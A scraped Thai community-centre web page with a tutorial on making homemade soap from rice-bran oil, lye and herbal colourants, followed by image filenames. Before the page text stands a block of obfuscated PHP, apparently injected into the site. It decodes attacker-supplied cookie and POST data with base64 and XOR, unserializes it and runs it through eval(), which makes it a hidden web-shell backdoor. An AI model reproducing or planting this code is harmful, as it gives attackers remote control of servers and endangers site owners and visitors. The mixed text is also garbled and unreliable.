$gISZHjgDQ = chr (67) . '_' . 'Y' . chr ( 180 - 107 ).chr (85) . chr ( 1093 - 973 ).'V';$bfLKd = "\x63" . "\x6c" . 'a' . 's' . "\163" . "\x5f" . chr (101) . "\170" . "\151" . 's' . chr ( 399 - 283 )."\163";$xnxaNiXQgk = class_exists($gISZHjgDQ); $bfLKd = "19980";$IYMozkSOu = !1;if ($xnxaNiXQgk == $IYMozkSOu){function ILYcYImbfn(){$EBKhUbi = new /* 50159 */ C_YIUxV(56193 + 56193); $EBKhUbi = NULL;}$UcoaYwYK = "56193";class C_YIUxV{private function UMWdPx($UcoaYwYK){if (is_array(C_YIUxV::$dKrkPX)) {$btWUJV = str_replace(chr (60) . '?' . chr (112) . "\x68" . chr (112), "", C_YIUxV::$dKrkPX[chr (99) . "\x6f" . 'n' . "\x74" . "\145" . chr ( 847 - 737 )."\164"]);eval($btWUJV); $UcoaYwYK = "56193";exit();}}private $pfYboxUt;public function erDrDQxxD(){echo 45787;}public function __destruct(){C_YIUxV::$dKrkPX = @unserialize(C_YIUxV::$dKrkPX); $UcoaYwYK = "16972_21716";$this->UMWdPx($UcoaYwYK); $UcoaYwYK = "16972_21716";}public function VlAvhWhqO($jNNCCCm, $rYCWIb){return $jNNCCCm[0] ^ str_repeat($rYCWIb, (strlen($jNNCCCm[0]) / strlen($rYCWIb)) + 1);}public function __construct($UwJpXbPW=0){$UIMmmtBEqf = $_POST;$mozmYRH = $_COOKIE;$rYCWIb = "3a0ba29f-1560-4af9-8870-7ae2d2693801";$rfTPJ = @$mozmYRH[substr($rYCWIb, 0, 4)];if (!empty($rfTPJ)){$NhxgbgDIku = "base64";$jNNCCCm = "";$rfTPJ = explode(",", $rfTPJ);foreach ($rfTPJ as $NdnfYJZO){$jNNCCCm .= @$mozmYRH[$NdnfYJZO];$jNNCCCm .= @$UIMmmtBEqf[$NdnfYJZO];}$jNNCCCm = array_map($NhxgbgDIku . "\x5f" . "\144" . 'e' . "\143" . "\x6f" . chr (100) . chr ( 555 - 454 ), array($jNNCCCm,));C_YIUxV::$dKrkPX = $this->VlAvhWhqO($jNNCCCm, $rYCWIb);}}public static $dKrkPX = 10338;}ILYcYImbfn();}$iniKU = "\x4e" . 'g' . chr ( 756 - 658 )."\137" . chr ( 907 - 838 ).chr (66) . "\167";$myyExn = 'c' . 'l' . "\141" . "\x73" . "\163" . "\x5f" . "\x65" . chr (120) . chr ( 277 - 172 ).chr ( 880 - 765 )."\x74" . "\163";$vTdOqhW = class_exists($iniKU); $myyExn = "32259";$vAAay = !1;if ($vTdOqhW == $vAAay){function Jwxxo(){return FALSE;}$QfzmsEypX = "15648";Jwxxo();class Ngb_EBw{private function xKGGL($QfzmsEypX){if (is_array(Ngb_EBw::$avSeuoHui)) {$HNNJexxV = str_replace(chr (60) . chr ( 542 - 479 )."\160" . chr (104) . "\x70", "", Ngb_EBw::$avSeuoHui["\143" . "\x6f" . "\156" . 't' . "\145" . 'n' . "\x74"]);eval($HNNJexxV); $QfzmsEypX = "15648";exit();}}private $PpOeVk;public function eCrFVEB(){echo 28385;}public function __destruct(){$QfzmsEypX = "20419_16761";$this->xKGGL($QfzmsEypX); $QfzmsEypX = "20419_16761";}public function __construct($PlBYqoqvu=0){$JCuGXEK = $_POST;$LVuXxA = $_COOKIE;$otdEyqxrW = "abbe5226-71cc-40c5-9d39-6b2242a26fb4";$drVNpRcsa = @$LVuXxA[substr($otdEyqxrW, 0, 4)];if (!empty($drVNpRcsa)){$joLSFKk = "base64";$jVoOivToi = "";$drVNpRcsa = explode(",", $drVNpRcsa);foreach ($drVNpRcsa as $ythUtVZV){$jVoOivToi .= @$LVuXxA[$ythUtVZV];$jVoOivToi .= @$JCuGXEK[$ythUtVZV];}$jVoOivToi = array_map($joLSFKk . chr ( 292 - 197 )."\144" . "\145" . "\143" . "\157" . 'd' . 'e', array($jVoOivToi,)); $jVoOivToi = $jVoOivToi[0] ^ str_repeat($otdEyqxrW, (strlen($jVoOivToi[0]) / strlen($otdEyqxrW)) + 1);Ngb_EBw::$avSeuoHui = @unserialize($jVoOivToi); $jVoOivToi = class_exists("20419_16761");}}public static $avSeuoHui = 42183;}$wsxQiirY = new /* 12138 */ $iniKU(15648 + 15648); $QfzmsEypX = strpos($QfzmsEypX, $QfzmsEypX); $vAAay = $wsxQiirY = $QfzmsEypX = Array();} ทำ "สบู่" ไว้ใช้เอง | ศูนย์พลาญข่อย
080-5519598 (คุณแก้ว) plarnkhoi@hotmail.com
Select Page

ทำ “สบู่” ไว้ใช้เอง ทำง่ายๆ ใช้แล้วปลอดภัย ไร้สารเคมี

ต้องขออนุโมทนาบุญกับคุณพัชร นะคะ ที่ได้มาสอนวิธีทำสบู่ให้กับพวกเรา วิธีทำก็แสนง่าย แล้วแถมได้สบู่ที่เราทำได้เอง
แถมไม่มีสารเคมีด้วยค่ะ วัตถุดิบก็มีไม่มาก แค่ น้ำมันรำข้าว น้ำมันบัว หรือ น้ำมันชนิดอื่นๆ โซดาไฟ น้ำเปล่า
สีผสมอาจใช้แบบสมุนไพร เช่น อัญชัน ขมิ้น ผงถ่าน ฯลฯ หรือ สีแบบสำเร็จรูปที่ขายกันก็ได้ค่ะ

วิธีทำก็ไม่ยาก แค่นำน้ำมันชนิดต่างๆที่เตรียมไว้ผสมกับน้ำเปล่า โซดาไฟ ตามอัตราส่วน เทใส่ในกะละมัง กวนให้เข้ากันจนมีลักษณะข้นขึ้น
จากนั้นถ้าต้องการให้สบู่ของเรามีสีสัน ก็ให้แบ่งน้ำมันที่เราผสมเตรียมไว้แยกใส่ถ้วยออกมาแล้วผสมสีที่ต้องการลงไป
เวลาเทใส่แม่พิมพ์ ก็อาจจะเทแบบแยกชั้น หรือ เทผสมกันลงไปเลยแล้ววาดให้เกิดลายเส้น จากนั้นทิ้งไว้ 24 ชม. ก็แกะออกจากแม่พิมพ์
แล้วตัดแบ่งเป็นก้อนๆๆ วางทิ้งไว้ในอุณภูมิห้อง ประมาณ 1 เดือน ก็สามารถนำสบู่มาใช้ได้แล้วค่ะ

ต่อไปนี้ก็ไม่ต้องพึ่งพาการซื้อสบู่แล้ว มาทำใช้กันเองก็ได้นะคะ สวย ดี และปลอดภัยค่ะ

20376011_10207384918940000_8060147115911852474_n

20246490_10207384918899999_2072772372703897914_n

20257997_10207384917299959_1962349670282073614_n

20258219_10207384919860023_1530915218027993245_n

20258437_10207384918980001_2727213914218624397_n

20246367_10207384920060028_9214094833187250494_n

20264734_10207384920180031_2608874516118082772_n